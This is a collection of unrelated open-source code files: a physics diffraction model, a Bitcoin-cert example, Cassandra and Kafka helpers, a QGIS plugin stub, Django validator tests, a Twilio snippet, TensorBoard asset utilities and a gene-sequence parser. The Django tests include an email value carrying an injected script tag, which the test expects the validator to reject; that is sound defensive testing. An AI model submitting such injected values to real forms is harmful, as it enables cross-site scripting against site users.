fam = (pa*fa).sum(0)
fbm = (pb*fb).sum(0)
phia = (pa*np.exp(2*np.pi*1.0J*ta*l)*fa.conj()).sum(0)
phib = (pb*np.exp(2*np.pi*1.0J*tb*l)*fb.conj()).sum(0)
ta = (pa*np.exp(2*np.pi*1.0J*ta*l)).sum(0)
tb = (pb*np.exp(2*np.pi*1.0J*tb*l)).sum(0)
m = self.repetitions
ksi = 2*np.pi*1.0J*l*self.a - (2*np.pi*l*self.c)**2/2.
# Calculate the intensity
int = (m*(fafa + 2.0*np.real(np.exp(ksi)*phia*fbm) + fbfb) +
2.0*np.real((np.exp(-ksi)*phib*fam/ta/tb + phia*fam/ta +
phib*fbm/tb + np.exp(ksi)*phia*fbm)*(
(m - (m + 1)*np.exp(2.0*ksi)*ta*tb +
(np.exp(2.0*ksi)*ta*tb)**(m + 1))/
(1 - np.exp(2.0*ksi)*ta*tb)**2 - m)))
return int
def _make_set_func(self, name, val):
'''Creates a function to set value for attribute with name'''
def set_func(value):
setattr(self, name, value)
# Init the variable
set_func(val)
setattr(self, 'set' + name, set_func)
def _make_get_func(self, name):
''' Creates a get function '''
def get_func():
return getattr(self, name)
setattr(self, 'get' + name, get_func)
if __name__ == '__main__':
from pylab import *
inst = genx.models.sxrd.Instrument(wavel = 0.77, alpha = 0.2)
inst.set_inten(100.0)
lay_a = genx.models.sxrd.Slab()
lay_a.add_atom('Sr', 'sr', 0.0, 0.0, 0.0, 0.001, 1.0)
lay_a.add_atom('Ti', 'ti', 0.5, 0.5, 0.5, 0.001, 1.0)
lay_a.add_atom('O1', 'o', 0.5, 0.0, 0.5, 0.001, 1.0)
lay_a.add_atom('O2', 'o', 0.0, 0.5, 0.5, 0.001, 1.0)
lay_a.add_atom('O3', 'o', 0.5, 0.5, 0.0, 0.001, 1.0)
lay_b = genx.models.sxrd.Slab(c = 1.0)
lay_b.add_atom('La', 'la', 0.0, 0.0, 0.0, 0.001, 1.0, 1.0)
lay_b.add_atom('Al', 'al', 0.5, 0.5, 0.5, 0.001, 1.0, 1.0)
lay_b.add_atom('O1', 'o', 0.5, 0.5, 0.0, 0.001, 1.0, 1.)
lay_b.add_atom('O2', 'o', 0.0, 0.5, 0.5, 0.001, 1.0, 1.)
lay_b.add_atom('O3', 'o', 0.5, 0.0, 0.5, 0.001, 1.0, 1.)
uc = genx.models.sxrd.UnitCell(3.945, 3.945, 3.945, 90, 90, 90)
sl = SLStandard(inst, uc, lay_b, lay_a)
sl_sample = SLSample(inst, lay_a, sl, uc)
sl.seta(0.0)
sl.setc(0.00001)
sl.setna(4.0)
# Seems to have a lower limit of about 0.3 UC to work fine
    # with the calculation of thicknesses.
sl.setsigmaa(0.3)
sl.setnb(2.0)
sl.setsigmab(0.3)
sl.setrepetitions(10)
l = np.arange(0.1, 3, 0.0011)
h = 0.0*np.ones(l.shape)
k = 0.0*np.ones(l.shape)
int = sl_sample.calc_i(h, k, l)
sample = genx.models.sxrd.Sample(inst, lay_a, ([lay_b]*4 + [lay_a]*2)*10,
genx.models.sxrd.UnitCell(3.945, 3.945, 3.945, 90, 90, 90))
f_ref = sample.calc_f(h,k,l)
int_ref = abs(f_ref)**2
# Comparison between the normal sxrd model and the superlattice model.
semilogy(l, int_ref)
semilogy(l, int)
legend(('sxrd model', 'sxrd_mult closed form'))
xlabel('l [r.l.u.]')
ylabel('Intensity')
show()
|
haozhangphd/genx-py3
|
genx/models/sxrd_mult.py
|
Python
|
gpl-3.0
| 12,753 | 0.008469 |
#!/usr/bin/python
import sys
sys.path.append('..')
from bcert_pb2 import *
import binascii
# fill out a minimal bitcoin cert
cert = BitcoinCert()
# first the data part (the part is later signed by the "higher level cert" or "the blockchain")
cert.data.version = '0.1'
cert.data.subjectname = 'Foo Inc.'
email = cert.data.contacts.add()
email.type = email.EMAIL
email.value = 'foo@fooinc.com'
url = cert.data.contacts.add()
url.type = url.URL
url.value = 'http://www.fooinc.com'
paykey = cert.data.paymentkeys.add()
paykey.usage = paykey.PAYMENT
paykey.algorithm.type = paykey.algorithm.STATIC_BTCADDR # is default anyway
key = paykey.value.append("mrMyF68x19kAc2byGKqR9MLfdAe1t5MPzh")
#key = paykey.value.append("0211b60f23135a806aff2c8f0fbbe620c16ba05a9ca4772735c08a16407f185b34".decode('hex'))
# this is standard in bitcoin ripemd(sha256())
from bitcoin import hash_160
# add signature to cert
#sig = cert.signatures.add()
#sig.algorithm.type = sig.algorithm.BCPKI
#sig.algorithm.version = "0.3"
#sig.value = "foo1" # for signatures of type BCPKI the alias IS the value,
# other types place the signature of BitcoinCertDataToHash(certData) here,
# for BCPKI this hash appears in the blockchain instead
# see how the cert looks
print cert
# serialize it
def CertToAscii(cert):
ser = cert.SerializeToString()
crc = binascii.crc32(ser) & 0xffffff # keep only last 24 bit (should use CRC-24 like OpenPGP)
# OpenPGP uses initializations for its crc-24, see http://tools.ietf.org/html/rfc2440
asc = binascii.b2a_base64(cert.SerializeToString())[:-1] # without trailing newline
asc += '=' # checksum is seperated by =
asc += binascii.b2a_base64(('%06x'%crc).decode('hex'))
return asc
def CertToAsciiMsg(cert):
ver = cert.version
asc = CertToAscii(cert)
res = '-----BEGIN BTCPKI CERTIFICATE-----\n'
res += 'Version: '+cert.version+'\n\n'
res += '\n'.join(asc[i:i+72] for i in xrange(0, len(asc), 72))
res += '-----END BTCPKI CERTIFICATE-----\n'
return res
# TODO: AsciiToCert
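# A minimal sketch of the inverse (an assumption, not part of the original
# file): undo CertToAscii by splitting off the 4-character crc block after the
# last '=', checking it, and parsing the protobuf bytes back into a cert.
def AsciiToCert(asc):
    body, crc_part = asc.rsplit('=', 1)
    ser = binascii.a2b_base64(body)
    crc = binascii.crc32(ser) & 0xffffff
    if binascii.a2b_base64(crc_part) != ('%06x' % crc).decode('hex'):
        raise ValueError('certificate checksum mismatch')
    cert = BitcoinCert()
    cert.ParseFromString(ser)
    return cert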
from e import derivepubkey
#print "deriving filename from: "+normalized
#fname = id+'.bcrt'
fname = 'foo1_static.bcrt'
f=open(fname,'wb')
f.write(cert.SerializeToString())
f.close()
print "binary cert written to: "+fname
#fname = id+'.acrt'
#f=open(fname,'wb')
#f.write(CertToAscii(cert))
#f.close()
#print "ascii cert written to: "+fname
#fname = 'my.data'
#f=open(fname,'wb')
#f.write(cert.data.SerializeToString())
#f.close()
#print "binary data part written to: "+fname
# see the hash
print "hash of data part is: "+hash_160(cert.data.SerializeToString()).encode('hex')
print "hex binary cert: "+cert.SerializeToString().encode('hex')
#print CertToAscii(cert)
#print CertToAsciiMsg(cert)
# OLD
#from subprocess import Popen,PIPE,check_call,call
#p = Popen(['./bitcoind','-testnet','registeralias','foo3','0.5',hash],stdout=PIPE)
#result = p.stdout.read()
#print result
|
bcpki/bitcoin
|
src/bcert/examples/mk_foo1_static.py
|
Python
|
mit
| 2,934 | 0.023177 |
import csv
import random
import cassandra
from nose.tools import assert_items_equal
class DummyColorMap(object):
def __getitem__(self, *args):
return ''
def csv_rows(filename, delimiter=None):
"""
Given a filename, opens a csv file and yields it line by line.
"""
reader_opts = {}
if delimiter is not None:
reader_opts['delimiter'] = delimiter
with open(filename, 'rb') as csvfile:
for row in csv.reader(csvfile, **reader_opts):
yield row
def assert_csvs_items_equal(filename1, filename2):
with open(filename1, 'r') as x, open(filename2, 'r') as y:
assert_items_equal(list(x.readlines()), list(y.readlines()))
def random_list(gen=None, n=None):
if gen is None:
def gen():
return random.randint(-1000, 1000)
if n is None:
def length():
return random.randint(1, 5)
else:
def length():
return n
return [gen() for _ in range(length())]
def write_rows_to_csv(filename, data):
with open(filename, 'wb') as csvfile:
writer = csv.writer(csvfile)
for row in data:
writer.writerow(row)
        csvfile.close()
def monkeypatch_driver():
"""
Monkeypatches the `cassandra` driver module in the same way
    that cqlsh does. Returns a dictionary containing the original values of
the monkeypatched names.
"""
cache = {'deserialize': cassandra.cqltypes.BytesType.deserialize,
'support_empty_values': cassandra.cqltypes.CassandraType.support_empty_values}
cassandra.cqltypes.BytesType.deserialize = staticmethod(lambda byts, protocol_version: bytearray(byts))
cassandra.cqltypes.CassandraType.support_empty_values = True
return cache
def unmonkeypatch_driver(cache):
"""
Given a dictionary that was used to cache parts of `cassandra` for
monkeypatching, restore those values to the `cassandra` module.
"""
cassandra.cqltypes.BytesType.deserialize = staticmethod(cache['deserialize'])
cassandra.cqltypes.CassandraType.support_empty_values = cache['support_empty_values']
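def with_patched_driver(func, *args, **kwargs):
    """
    Usage sketch (an assumption, not part of the original module): run `func`
    with the cqlsh-style driver monkeypatches applied, restoring the original
    `cassandra` attributes afterwards even if `func` raises.
    """
    cache = monkeypatch_driver()
    try:
        return func(*args, **kwargs)
    finally:
        unmonkeypatch_driver(cache)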
|
carlyeks/cassandra-dtest
|
cqlsh_tests/cqlsh_tools.py
|
Python
|
apache-2.0
| 2,124 | 0.001883 |
class StoreChangeLogger:
def __init__(self, store_name, context) -> None:
self.topic = f'{context.application_id}-{store_name}-changelog'
self.context = context
self.partition = context.task_id.partition
self.record_collector = context.state_record_collector
def log_change(self, key: bytes, value: bytes) -> None:
if self.record_collector:
self.record_collector.send(self.topic, key, value, self.context.timestamp, partition=self.partition)
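# A minimal usage sketch (assumptions: the context object only needs the
# attributes read above; all names below are hypothetical, not part of the
# winton_kafka_streams API).
if __name__ == '__main__':
    class _FakeTaskId:
        partition = 0
    class _FakeContext:
        application_id = 'my-app'
        task_id = _FakeTaskId()
        state_record_collector = None  # with no collector, log_change is a no-op
        timestamp = 0
    logger = StoreChangeLogger('my-store', _FakeContext())
    logger.log_change(b'key', b'value')  # topic would be 'my-app-my-store-changelog'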
|
wintoncode/winton-kafka-streams
|
winton_kafka_streams/state/logging/store_change_logger.py
|
Python
|
apache-2.0
| 503 | 0.001988 |
# -*- coding: utf-8 -*-
"""
/***************************************************************************
GeobricksTRMM
A QGIS plugin
Download TRMM daily data.
-------------------
begin : 2015-10-06
copyright : (C) 2015 by Geobricks
email : info@geobricks.org
git sha : $Format:%H$
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
This script initializes the plugin, making it known to QGIS.
"""
# noinspection PyPep8Naming
def classFactory(iface): # pylint: disable=invalid-name
"""Load GeobricksTRMM class from file GeobricksTRMM.
:param iface: A QGIS interface instance.
:type iface: QgsInterface
"""
#
from .geobricks_trmm_qgis import GeobricksTRMM
return GeobricksTRMM(iface)
|
geobricks/geobricks_qgis_plugin_trmm
|
__init__.py
|
Python
|
gpl-2.0
| 1,510 | 0 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from datetime import datetime, timedelta
import re
import types
from unittest import TestCase
from django.core.exceptions import ValidationError
from django.core.validators import (
BaseValidator, EmailValidator, MaxLengthValidator, MaxValueValidator,
MinLengthValidator, MinValueValidator, RegexValidator, URLValidator,
validate_comma_separated_integer_list, validate_email, validate_integer,
validate_ipv46_address, validate_ipv4_address, validate_ipv6_address,
validate_slug,
)
from django.test.utils import str_prefix
NOW = datetime.now()
EXTENDED_SCHEMES = ['http', 'https', 'ftp', 'ftps', 'git', 'file']
TEST_DATA = (
# (validator, value, expected),
(validate_integer, '42', None),
(validate_integer, '-42', None),
(validate_integer, -42, None),
(validate_integer, -42.5, None),
(validate_integer, None, ValidationError),
(validate_integer, 'a', ValidationError),
(validate_email, 'email@here.com', None),
(validate_email, 'weirder-email@here.and.there.com', None),
(validate_email, 'email@[127.0.0.1]', None),
(validate_email, 'email@[2001:dB8::1]', None),
(validate_email, 'email@[2001:dB8:0:0:0:0:0:1]', None),
(validate_email, 'email@[::fffF:127.0.0.1]', None),
(validate_email, 'example@valid-----hyphens.com', None),
(validate_email, 'example@valid-with-hyphens.com', None),
(validate_email, 'test@domain.with.idn.tld.उदाहरण.परीक्षा', None),
(validate_email, 'email@localhost', None),
(EmailValidator(whitelist=['localdomain']), 'email@localdomain', None),
(validate_email, '"test@test"@example.com', None),
(validate_email, None, ValidationError),
(validate_email, '', ValidationError),
(validate_email, 'abc', ValidationError),
(validate_email, 'abc@', ValidationError),
(validate_email, 'abc@bar', ValidationError),
(validate_email, 'a @x.cz', ValidationError),
(validate_email, 'abc@.com', ValidationError),
(validate_email, 'something@@somewhere.com', ValidationError),
(validate_email, 'email@127.0.0.1', ValidationError),
(validate_email, 'email@[127.0.0.256]', ValidationError),
(validate_email, 'email@[2001:db8::12345]', ValidationError),
(validate_email, 'email@[2001:db8:0:0:0:0:1]', ValidationError),
(validate_email, 'email@[::ffff:127.0.0.256]', ValidationError),
(validate_email, 'example@invalid-.com', ValidationError),
(validate_email, 'example@-invalid.com', ValidationError),
(validate_email, 'example@invalid.com-', ValidationError),
(validate_email, 'example@inv-.alid-.com', ValidationError),
(validate_email, 'example@inv-.-alid.com', ValidationError),
(validate_email, 'test@example.com\n\n<script src="x.js">', ValidationError),
# Quoted-string format (CR not allowed)
(validate_email, '"\\\011"@here.com', None),
(validate_email, '"\\\012"@here.com', ValidationError),
(validate_email, 'trailingdot@shouldfail.com.', ValidationError),
(validate_slug, 'slug-ok', None),
(validate_slug, 'longer-slug-still-ok', None),
(validate_slug, '--------', None),
(validate_slug, 'nohyphensoranything', None),
(validate_slug, '', ValidationError),
(validate_slug, ' text ', ValidationError),
(validate_slug, ' ', ValidationError),
(validate_slug, 'some@mail.com', ValidationError),
(validate_slug, '你好', ValidationError),
(validate_slug, '\n', ValidationError),
(validate_ipv4_address, '1.1.1.1', None),
(validate_ipv4_address, '255.0.0.0', None),
(validate_ipv4_address, '0.0.0.0', None),
(validate_ipv4_address, '256.1.1.1', ValidationError),
(validate_ipv4_address, '25.1.1.', ValidationError),
(validate_ipv4_address, '25,1,1,1', ValidationError),
(validate_ipv4_address, '25.1 .1.1', ValidationError),
# validate_ipv6_address uses django.utils.ipv6, which
# is tested in much greater detail in its own testcase
(validate_ipv6_address, 'fe80::1', None),
(validate_ipv6_address, '::1', None),
(validate_ipv6_address, '1:2:3:4:5:6:7:8', None),
(validate_ipv6_address, '1:2', ValidationError),
(validate_ipv6_address, '::zzz', ValidationError),
(validate_ipv6_address, '12345::', ValidationError),
(validate_ipv46_address, '1.1.1.1', None),
(validate_ipv46_address, '255.0.0.0', None),
(validate_ipv46_address, '0.0.0.0', None),
(validate_ipv46_address, 'fe80::1', None),
(validate_ipv46_address, '::1', None),
(validate_ipv46_address, '1:2:3:4:5:6:7:8', None),
(validate_ipv46_address, '256.1.1.1', ValidationError),
(validate_ipv46_address, '25.1.1.', ValidationError),
(validate_ipv46_address, '25,1,1,1', ValidationError),
(validate_ipv46_address, '25.1 .1.1', ValidationError),
(validate_ipv46_address, '1:2', ValidationError),
(validate_ipv46_address, '::zzz', ValidationError),
(validate_ipv46_address, '12345::', ValidationError),
(validate_comma_separated_integer_list, '1', None),
(validate_comma_separated_integer_list, '1,2,3', None),
(validate_comma_separated_integer_list, '1,2,3,', None),
(validate_comma_separated_integer_list, '', ValidationError),
(validate_comma_separated_integer_list, 'a,b,c', ValidationError),
(validate_comma_separated_integer_list, '1, 2, 3', ValidationError),
(MaxValueValidator(10), 10, None),
(MaxValueValidator(10), -10, None),
(MaxValueValidator(10), 0, None),
(MaxValueValidator(NOW), NOW, None),
(MaxValueValidator(NOW), NOW - timedelta(days=1), None),
(MaxValueValidator(0), 1, ValidationError),
(MaxValueValidator(NOW), NOW + timedelta(days=1), ValidationError),
(MinValueValidator(-10), -10, None),
(MinValueValidator(-10), 10, None),
(MinValueValidator(-10), 0, None),
(MinValueValidator(NOW), NOW, None),
(MinValueValidator(NOW), NOW + timedelta(days=1), None),
(MinValueValidator(0), -1, ValidationError),
(MinValueValidator(NOW), NOW - timedelta(days=1), ValidationError),
(MaxLengthValidator(10), '', None),
(MaxLengthValidator(10), 10 * 'x', None),
(MaxLengthValidator(10), 15 * 'x', ValidationError),
(MinLengthValidator(10), 15 * 'x', None),
(MinLengthValidator(10), 10 * 'x', None),
(MinLengthValidator(10), '', ValidationError),
(URLValidator(), 'http://www.djangoproject.com/', None),
(URLValidator(), 'HTTP://WWW.DJANGOPROJECT.COM/', None),
(URLValidator(), 'http://localhost/', None),
(URLValidator(), 'http://example.com/', None),
(URLValidator(), 'http://www.example.com/', None),
(URLValidator(), 'http://www.example.com:8000/test', None),
(URLValidator(), 'http://valid-with-hyphens.com/', None),
(URLValidator(), 'http://subdomain.example.com/', None),
(URLValidator(), 'http://200.8.9.10/', None),
(URLValidator(), 'http://200.8.9.10:8000/test', None),
(URLValidator(), 'http://valid-----hyphens.com/', None),
(URLValidator(), 'http://example.com?something=value', None),
(URLValidator(), 'http://example.com/index.php?something=value&another=value2', None),
(URLValidator(), 'https://example.com/', None),
(URLValidator(), 'ftp://example.com/', None),
(URLValidator(), 'ftps://example.com/', None),
(URLValidator(EXTENDED_SCHEMES), 'file://localhost/path', None),
(URLValidator(EXTENDED_SCHEMES), 'git://example.com/', None),
(URLValidator(), 'foo', ValidationError),
(URLValidator(), 'http://', ValidationError),
(URLValidator(), 'http://example', ValidationError),
(URLValidator(), 'http://example.', ValidationError),
(URLValidator(), 'http://.com', ValidationError),
(URLValidator(), 'http://invalid-.com', ValidationError),
(URLValidator(), 'http://-invalid.com', ValidationError),
(URLValidator(), 'http://invalid.com-', ValidationError),
(URLValidator(), 'http://inv-.alid-.com', ValidationError),
(URLValidator(), 'http://inv-.-alid.com', ValidationError),
(URLValidator(), 'file://localhost/path', ValidationError),
(URLValidator(), 'git://example.com/', ValidationError),
(URLValidator(EXTENDED_SCHEMES), 'git://-invalid.com', ValidationError),
(BaseValidator(True), True, None),
(BaseValidator(True), False, ValidationError),
(RegexValidator(), '', None),
(RegexValidator(), 'x1x2', None),
(RegexValidator('[0-9]+'), 'xxxxxx', ValidationError),
(RegexValidator('[0-9]+'), '1234', None),
(RegexValidator(re.compile('[0-9]+')), '1234', None),
(RegexValidator('.*'), '', None),
(RegexValidator(re.compile('.*')), '', None),
(RegexValidator('.*'), 'xxxxx', None),
(RegexValidator('x'), 'y', ValidationError),
(RegexValidator(re.compile('x')), 'y', ValidationError),
(RegexValidator('x', inverse_match=True), 'y', None),
(RegexValidator(re.compile('x'), inverse_match=True), 'y', None),
(RegexValidator('x', inverse_match=True), 'x', ValidationError),
(RegexValidator(re.compile('x'), inverse_match=True), 'x', ValidationError),
(RegexValidator('x', flags=re.IGNORECASE), 'y', ValidationError),
(RegexValidator('a'), 'A', ValidationError),
(RegexValidator('a', flags=re.IGNORECASE), 'A', None),
)
def create_simple_test_method(validator, expected, value, num):
if expected is not None and issubclass(expected, Exception):
test_mask = 'test_%s_raises_error_%d'
def test_func(self):
# assertRaises not used, so as to be able to produce an error message
# containing the tested value
try:
validator(value)
except expected:
pass
else:
self.fail("%s not raised when validating '%s'" % (
expected.__name__, value))
else:
test_mask = 'test_%s_%d'
def test_func(self):
try:
self.assertEqual(expected, validator(value))
except ValidationError as e:
self.fail("Validation of '%s' failed. Error message was: %s" % (
value, str(e)))
if isinstance(validator, types.FunctionType):
val_name = validator.__name__
else:
val_name = validator.__class__.__name__
test_name = test_mask % (val_name, num)
return test_name, test_func
# Dynamically assemble a test class with the contents of TEST_DATA
class TestSimpleValidators(TestCase):
def test_single_message(self):
v = ValidationError('Not Valid')
self.assertEqual(str(v), str_prefix("[%(_)s'Not Valid']"))
self.assertEqual(repr(v), str_prefix("ValidationError([%(_)s'Not Valid'])"))
def test_message_list(self):
v = ValidationError(['First Problem', 'Second Problem'])
self.assertEqual(str(v), str_prefix("[%(_)s'First Problem', %(_)s'Second Problem']"))
self.assertEqual(repr(v), str_prefix("ValidationError([%(_)s'First Problem', %(_)s'Second Problem'])"))
def test_message_dict(self):
v = ValidationError({'first': ['First Problem']})
self.assertEqual(str(v), str_prefix("{%(_)s'first': [%(_)s'First Problem']}"))
self.assertEqual(repr(v), str_prefix("ValidationError({%(_)s'first': [%(_)s'First Problem']})"))
def test_regex_validator_flags(self):
try:
RegexValidator(re.compile('a'), flags=re.IGNORECASE)
except TypeError:
pass
else:
self.fail("TypeError not raised when flags and pre-compiled regex in RegexValidator")
test_counter = 0
for validator, value, expected in TEST_DATA:
name, method = create_simple_test_method(validator, expected, value, test_counter)
setattr(TestSimpleValidators, name, method)
test_counter += 1
class TestValidatorEquality(TestCase):
"""
Tests that validators have valid equality operators (#21638)
"""
def test_regex_equality(self):
self.assertEqual(
RegexValidator(r'^(?:[a-z0-9\.\-]*)://'),
RegexValidator(r'^(?:[a-z0-9\.\-]*)://'),
)
self.assertNotEqual(
RegexValidator(r'^(?:[a-z0-9\.\-]*)://'),
RegexValidator(r'^(?:[0-9\.\-]*)://'),
)
self.assertEqual(
RegexValidator(r'^(?:[a-z0-9\.\-]*)://', "oh noes", "invalid"),
RegexValidator(r'^(?:[a-z0-9\.\-]*)://', "oh noes", "invalid"),
)
self.assertNotEqual(
RegexValidator(r'^(?:[a-z0-9\.\-]*)://', "oh", "invalid"),
RegexValidator(r'^(?:[a-z0-9\.\-]*)://', "oh noes", "invalid"),
)
self.assertNotEqual(
RegexValidator(r'^(?:[a-z0-9\.\-]*)://', "oh noes", "invalid"),
RegexValidator(r'^(?:[a-z0-9\.\-]*)://'),
)
self.assertNotEqual(
RegexValidator('', flags=re.IGNORECASE),
RegexValidator(''),
)
self.assertNotEqual(
RegexValidator(''),
RegexValidator('', inverse_match=True),
)
def test_regex_equality_nocache(self):
pattern = r'^(?:[a-z0-9\.\-]*)://'
left = RegexValidator(pattern)
re.purge()
right = RegexValidator(pattern)
self.assertEqual(
left,
right,
)
def test_regex_equality_blank(self):
self.assertEqual(
RegexValidator(),
RegexValidator(),
)
def test_email_equality(self):
self.assertEqual(
EmailValidator(),
EmailValidator(),
)
self.assertNotEqual(
EmailValidator(message="BAD EMAIL"),
EmailValidator(),
)
self.assertEqual(
EmailValidator(message="BAD EMAIL", code="bad"),
EmailValidator(message="BAD EMAIL", code="bad"),
)
def test_basic_equality(self):
self.assertEqual(
MaxValueValidator(44),
MaxValueValidator(44),
)
self.assertNotEqual(
MaxValueValidator(44),
MinValueValidator(44),
)
self.assertNotEqual(
MinValueValidator(45),
MinValueValidator(11),
)
|
wfxiang08/django178
|
tests/validators/tests.py
|
Python
|
bsd-3-clause
| 14,190 | 0.000918 |
#!/usr/bin/env python
# Install the Python helper library from twilio.com/docs/python/install
import os
from twilio.rest import Client
# To set up environmental variables, see http://twil.io/secure
ACCOUNT_SID = os.environ['TWILIO_ACCOUNT_SID']
AUTH_TOKEN = os.environ['TWILIO_AUTH_TOKEN']
client = Client(ACCOUNT_SID, AUTH_TOKEN)
notification = client.notify.services('ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
.notifications.create(identity='00000001',
body='Hello Bob')
print(notification.sid)
|
TwilioDevEd/api-snippets
|
notifications/register/send-notification/send-notification.7.x.py
|
Python
|
mit
| 528 | 0 |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Load plugin assets from disk."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path
import tensorflow as tf
_PLUGINS_DIR = "plugins"
def _IsDirectory(parent, item):
"""Helper that returns if parent/item is a directory."""
return tf.gfile.IsDirectory(os.path.join(parent, item))
def PluginDirectory(logdir, plugin_name):
"""Returns the plugin directory for plugin_name."""
return os.path.join(logdir, _PLUGINS_DIR, plugin_name)
def ListPlugins(logdir):
"""List all the plugins that have registered assets in logdir.
If the plugins_dir does not exist, it returns an empty list. This maintains
compatibility with old directories that have no plugins written.
Args:
logdir: A directory that was created by a TensorFlow events writer.
Returns:
a list of plugin names, as strings
"""
plugins_dir = os.path.join(logdir, _PLUGINS_DIR)
if not tf.gfile.IsDirectory(plugins_dir):
return []
entries = tf.gfile.ListDirectory(plugins_dir)
return [x for x in entries if _IsDirectory(plugins_dir, x)]
def ListAssets(logdir, plugin_name):
"""List all the assets that are available for given plugin in a logdir.
Args:
logdir: A directory that was created by a TensorFlow summary.FileWriter.
plugin_name: A string name of a plugin to list assets for.
Returns:
A string list of available plugin assets. If the plugin subdirectory does
not exist (either because the logdir doesn't exist, or because the plugin
didn't register) an empty list is returned.
"""
plugin_dir = PluginDirectory(logdir, plugin_name)
if not tf.gfile.IsDirectory(plugin_dir):
return []
entries = tf.gfile.ListDirectory(plugin_dir)
return [x for x in entries if not _IsDirectory(plugin_dir, x)]
def RetrieveAsset(logdir, plugin_name, asset_name):
"""Retrieve a particular plugin asset from a logdir.
Args:
logdir: A directory that was created by a TensorFlow summary.FileWriter.
plugin_name: The plugin we want an asset from.
asset_name: The name of the requested asset.
Returns:
string contents of the plugin asset.
Raises:
KeyError: if the asset does not exist.
"""
asset_path = os.path.join(PluginDirectory(logdir, plugin_name), asset_name)
try:
with tf.gfile.Open(asset_path, "r") as f:
return f.read()
except tf.errors.NotFoundError:
raise KeyError("Asset path %s not found" % asset_path)
except tf.errors.OpError as e:
raise KeyError("Couldn't read asset path: %s, OpError %s" % (asset_path, e))
|
sjperkins/tensorflow
|
tensorflow/tensorboard/backend/event_processing/plugin_asset_util.py
|
Python
|
apache-2.0
| 3,278 | 0.006406 |
# -*- coding:utf-8 -*-
# @author yuding
# 2017-09-23
import re
import os
import shutil
import msvcrt
import traceback
def mkdir(path):
    # Strip leading/trailing whitespace
path = path.strip()
    # Strip any trailing backslash
path = path.rstrip("\\")
isExists = os.path.exists(path)
if not isExists:
os.makedirs(path)
# Extract the target strings (position ranges, protein_id, gene) from the GenBank file
def getTargetData(fname):
    # Read the raw contents of the .gb file first
nc = open(fname + '.gb')
str = nc.read()
nc.close()
    # Normalize markers that would interfere with matching ("..>" -> "..")
str = re.sub(r'\.\.>', '..', str)
    # Capture the content from each CDS entry through its protein_id="..." and gene="..." fields
pattern = r'CDS.*?protein_id=".*?".*?gene=".*?"'
p = re.compile(pattern, re.S|re.I)
result = p.findall(str)
    # Extract the target pieces: the "xxx..xxx" position ranges plus the protein_id and gene values
newpattern = r'([\d]+?\.\.[\d]+,[\d]+?\.\.[\d]+,?[\d]+?\.\.[\d]+|[\d]+?\.\.[\d]+,?[\d]+?\.\.[\d]+|[\d]+?\.\.[\d]+).*protein_id="(.+?)".*gene="(.+?)"'
p2 = re.compile(newpattern, re.S|re.I)
    # Store the results in dictionaries keyed by protein_id
dic = {}
geneDic = {}
for unit in result:
result2 = p2.findall(unit)
value = re.split(',', result2[0][0])
key = result2[0][1]
dic[key] = value
geneDic[key] = result2[0][2]
return (dic, geneDic)
# Read the sequence content from the .fasta file
def getContent(fname):
tf = open(fname + '.fasta')
    first = tf.readline() # read and discard the first (header) line
    content = tf.read() # keep everything from the second line onwards
    # Strip the newlines so the sequence becomes one continuous string
content = re.sub(r'\n', '', content)
tf.close()
return content
def getAllData2(dirname, fname, name):
(dic, geneDic) = getTargetData(fname)
content = getContent(fname)
fl = open(dirname + '\\' + name + '.txt', 'wb')
length = len(content)
for unit in dic:
pt = ''
for k in dic[unit]:
pt = pt + k + ','
lh = len(pt)
if lh > 0:
pt = pt[0:lh - 1]
fl.write('name = ' + name + ', protein_id = ' + unit + ', ' + 'gene = ' + geneDic[unit] + ', position = ' + pt + ":\n")
for k in dic[unit]:
            # content is 0-indexed, so convert the 1-based positions
value = re.split(r'\.\.', k)
bg = int(value[0]) - 1
ed = int(value[1]) - 1
if bg > length - 1:
bg = length - 1
print 'begin beyond the max length'
if ed > length - 1:
print 'end beyond the max length' + ', length = ' + str(length) + ', ed = ' + str(ed)
ed = length - 1
final = content[bg : ed]
fl.write(final)
fl.write("\n")
fl.close()
def getPath():
    # Get the directory containing this script
dname = os.path.dirname(os.path.realpath(__file__))
dname = dname + '\\source'
filelist = os.listdir(dname)
names = []
for filename in filelist:
rl = re.split(r'\.', filename)
names.append(rl[0])
names = list(set(names))
return names
def getPackageData():
curfile = os.path.dirname(os.path.realpath(__file__))
names = getPath()
# make dir
mkdir(curfile + '\\result')
shutil.rmtree(curfile + '\\result')
mkdir(curfile + '\\result')
log = open(curfile + '\\log.txt', 'wb')
log.write('result path: ' + curfile + '\\result' + '\n')
for name in names:
try:
getAllData2(curfile + '\\result', curfile + '\\source\\' + name, name)
print('analysis id = ' + name + ',success')
log.write('analysis id = ' + name + ',success' + '\n')
except Exception, e:
print('analysis id = ' + name + ',fail')
log.write('analysis id = ' + name + ',fail')
log.write('message: ' + e.message)
log.close()
print('analysis finish')
print("Press 'd' to exit...")
while True:
if ord(msvcrt.getch()) in [68, 100]:
break
def main():
getPackageData()
if __name__ == '__main__':
main()
|
yuuagh/pywork
|
20171127/go.py
|
Python
|
gpl-3.0
| 4,158 | 0.015506 |
"""
.. module:: area_attribute
The **Area Attribute** Model.
PostgreSQL Definition
---------------------
The :code:`area_attribute` table is defined in the MusicBrainz Server as:
.. code-block:: sql
CREATE TABLE area_attribute ( -- replicate (verbose)
id SERIAL, -- PK
area INTEGER NOT NULL, -- references area.id
area_attribute_type INTEGER NOT NULL, -- references area_attribute_type.id
area_attribute_type_allowed_value INTEGER, -- references area_attribute_type_allowed_value.id
area_attribute_text TEXT
CHECK (
(area_attribute_type_allowed_value IS NULL AND area_attribute_text IS NOT NULL)
OR
(area_attribute_type_allowed_value IS NOT NULL AND area_attribute_text IS NULL)
)
);
"""
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
